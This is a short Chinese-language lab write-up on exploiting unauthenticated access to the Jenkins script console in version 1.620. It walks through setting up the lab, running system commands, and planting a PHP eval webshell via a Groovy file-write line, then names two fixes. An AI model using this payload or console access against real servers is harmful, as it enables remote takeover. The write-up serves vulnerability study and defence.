jenkins未授權訪問漏洞


jenkins未授權訪問漏洞

一、漏洞描述

未授權訪問管理控制台,可以通過腳本命令行執行系統命令。通過該漏洞,可以后台管理服務,通過腳本命令行功能執行系統命令,如反彈shell,wget寫webshell文件。

二、漏洞環境搭建

1、官方下載jenkins-1.620-1.1.noarch.rpm,下載地址:http://mirrors.jenkins.io

2、在redhat安裝jenkins

rpm -ivh jenkins-1.620-1.1.noarch.rpm

  

3、開啟jenkins服務

  

4、瀏覽器訪問http://192.168.10.137:8080,如下圖所示說明環境搭建成功

  

三、漏洞復現

1、瀏覽器訪問http://192.168.10.137:8080/manage,可以看到沒有做任何限制,可以直接訪問

  

2、點擊”腳本命令行”

  

3、執行系統命令,下圖看到成功執行系統命令

  

4、利用”腳本命令行”上傳webshell,內容如下:

new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');

  

5、點擊“運行”,沒有報錯,上傳成功

6、菜刀連接

  

四、漏洞防御

1、對后台控制頁面做登錄驗證限制

2、升級版本


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM